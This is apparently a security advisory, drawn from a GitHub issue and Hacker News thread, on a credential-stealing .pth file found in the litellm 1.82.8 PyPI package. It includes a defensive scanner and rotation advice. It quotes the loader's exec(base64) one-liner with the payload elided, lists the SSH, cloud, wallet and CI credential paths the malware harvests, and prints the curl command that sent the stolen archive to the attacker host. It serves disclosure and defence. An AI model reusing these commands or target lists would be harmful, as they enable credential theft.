The LiteLLM Python package has been hit by a supply chain attack.
Tell HN: Litellm 1.82.7 and 1.82.8 on PyPI are compromised

Original link: https://github.com/BerriAI/litellm/issues/24512

## Litellm package supply chain compromise

A serious security issue was found in `litellm==1.82.8` on PyPI. The package contains a malicious `.pth` file (`litellm_init.pth`) that *automatically* runs a credential-stealing script whenever the Python interpreter starts, without any import statement.

The script collects a large amount of sensitive information, including environment variables (which may expose API keys and secrets), SSH keys, cloud provider credentials (AWS, Azure, GCP, Kubernetes), crypto wallets, database credentials and CI/CD secrets. It then encrypts this data with AES-256 and a hard-coded RSA public key and exfiltrates it to `https://models.litellm.cloud/`.

The attack abuses Python's automatic execution of `.pth` files in `site-packages/`. The payload is obfuscated with double Base64 encoding.

**Impact:** Systems that installed `litellm==1.82.8` are at high risk of complete credential exposure.

**Recommendation:** Removal of the package from PyPI has been requested. Users should immediately check the `site-packages/` directory for a `litellm_init.pth` file and **rotate all credentials that may have been exposed on affected systems**.

Hacker News: Malicious litellm_init.pth in litellm 1.82.8 PyPI package – credential stealer (github.com/berriai), 733 points, posted by theanonymousone 1 day ago, 1 comment.

dang, 1 day ago: Comments moved to https://news.ycombinator.com/item?id=47501426, which was posted earlier.

Original text

Summary

The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.

This is a supply chain compromise. The malicious file is listed in the package's own RECORD:

litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628

Reproduction

```bash
# Download only the wheel (no dependencies) and list any .pth files it ships
pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"
```

You will see litellm_init.pth containing:

```python
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])
```

Malicious Behavior (full analysis)

The payload is double base64-encoded. When decoded, it performs the following:

Stage 1: Information Collection

The script collects sensitive data from the host system:

  • System info: hostname, whoami, uname -a, ip addr, ip route
  • Environment variables: printenv (captures all API keys, secrets, tokens)
  • SSH keys: ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/id_ecdsa, ~/.ssh/id_dsa, ~/.ssh/authorized_keys, ~/.ssh/known_hosts, ~/.ssh/config
  • Git credentials: ~/.gitconfig, ~/.git-credentials
  • AWS credentials: ~/.aws/credentials, ~/.aws/config, IMDS token + security credentials
  • Kubernetes secrets: ~/.kube/config, /etc/kubernetes/admin.conf, /etc/kubernetes/kubelet.conf, /etc/kubernetes/controller-manager.conf, /etc/kubernetes/scheduler.conf, service account tokens
  • GCP credentials: ~/.config/gcloud/application_default_credentials.json
  • Azure credentials: ~/.azure/
  • Docker configs: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json
  • Package manager configs: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.lftprc, ~/.msmtprc, ~/.my.cnf, ~/.pgpass, ~/.mongorc.js
  • Shell history: ~/.bash_history, ~/.zsh_history, ~/.sh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history
  • Crypto wallets: ~/.bitcoin/, ~/.litecoin/, ~/.dogecoin/, ~/.zcash/, ~/.dashcore/, ~/.ripple/, ~/.bitmonero/, ~/.ethereum/keystore/, ~/.cardano/, ~/.config/solana/
  • SSL/TLS private keys: /etc/ssl/private/, Let's Encrypt .pem and .key files
  • CI/CD secrets: terraform.tfvars, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg
  • Database credentials: PostgreSQL, MySQL, Redis, LDAP config files
  • Webhook URLs: grep for Slack/Discord webhook URLs in env and config files

Stage 2: Encryption & Exfiltration

  1. Collected data is written to a temporary file
  2. A random 32-byte AES-256 session key is generated via openssl rand
  3. The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
  4. The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
  5. Both encrypted files are packed into tpcp.tar.gz
  6. The archive is exfiltrated via:

```bash
curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz
```

Key Technical Details

  • Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
  • Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
  • Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
  • RSA public key (first 64 chars): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...

Impact

Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.

This affects:

  • Local development machines
  • CI/CD pipelines
  • Docker containers
  • Production servers

Affected Version

  • Confirmed: litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl)
  • Other versions: Not yet checked — the attacker may have compromised multiple releases

Recommended Actions

  1. PyPI: Yank/remove litellm 1.82.8 immediately
  2. Users: Check for litellm_init.pth in your site-packages/ directory
  3. Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
  4. BerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise
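A defender-side check for the trigger mechanism described under Key Technical Details and for step 2 above, as an added example that is not part of the issue or of the litellm project: it walks the `.pth` files in site-packages, flags any whose `import` lines carry exec/base64/subprocess markers, and peels the base64 layers so the body can be read instead of executed. The sample `.pth` content is constructed here with a harmless body and is not the real payload; `SUSPICIOUS_TOKENS`, `unwrap_payload`, `assess_pth` and `scan_dirs` are names chosen for this example.

```python
import base64, re, site
from pathlib import Path
# Tokens that have no business in a .pth "import" line that only adjusts sys.path.
SUSPICIOUS_TOKENS = ("exec(", "eval(", "base64", "subprocess", "Popen", "os.system")
B64_LITERAL = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def pth_exec_lines(text):
    """site.py executes every .pth line starting with 'import'; other lines are path entries."""
    return [ln for ln in text.splitlines() if ln.startswith("import")]

def unwrap_payload(code, max_layers=4):
    """Peel nested base64 out of an exec(base64.b64decode('...')) one-liner (raw or wrapped)."""
    layers, text = 0, code
    while text and layers < max_layers:
        m = B64_LITERAL.search(text)
        try:
            text = base64.b64decode(m.group(1) if m else text, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break  # not base64 any more: this is the innermost plaintext
        layers += 1
    return layers, text

def assess_pth(name, text):
    """Classify one .pth file and return the evidence behind the verdict."""
    exec_lines = pth_exec_lines(text)
    joined = "\n".join(exec_lines)
    layers, inner = unwrap_payload(joined)
    tokens = sorted(t for t in SUSPICIOUS_TOKENS if t in joined or t in inner)
    return {"file": name, "executes_code": bool(exec_lines), "b64_layers": layers,
            "tokens": tokens, "inner": inner,
            "suspicious": bool(exec_lines) and (layers > 0 or bool(tokens))}

def scan_dirs(dirs):
    """Assess every .pth file found directly in the given site-packages directories."""
    results = []
    for d in (Path(d) for d in dirs):
        if d.is_dir():
            for f in sorted(d.glob("*.pth")):
                results.append(assess_pth(str(f), f.read_text(errors="replace")))
    return results

# Constructed sample shaped like litellm_init.pth, with a harmless double-encoded body.
_INNER = base64.b64encode(b"print('constructed sample, not the real payload')").decode()
_OUTER = base64.b64encode(_INNER.encode()).decode()
SAMPLE_MALICIOUS = ('import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", '
                    '"import base64; exec(base64.b64decode(\'' + _OUTER + '\'))"])\n')
SAMPLE_BENIGN = "/opt/vendor/lib\nimport sys; sys.path.append('/opt/vendor/lib')\n"

if __name__ == "__main__":  # scan this interpreter's own site-packages directories
    for r in scan_dirs(site.getsitepackages() + [site.getusersitepackages()]):
        print(("SUSPICIOUS" if r["suspicious"] else "ok"), r["file"], r["tokens"])
```

Run it inside every virtualenv and container image that may have pulled the package; a benign `.pth` with an `import` line is reported but not flagged, so review the printed tokens rather than the mere presence of the file.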

Environment

  • OS: Ubuntu 24.04 (Docker container)
  • Python: 3.13
  • pip installed from PyPI
  • Discovered: 2026-03-24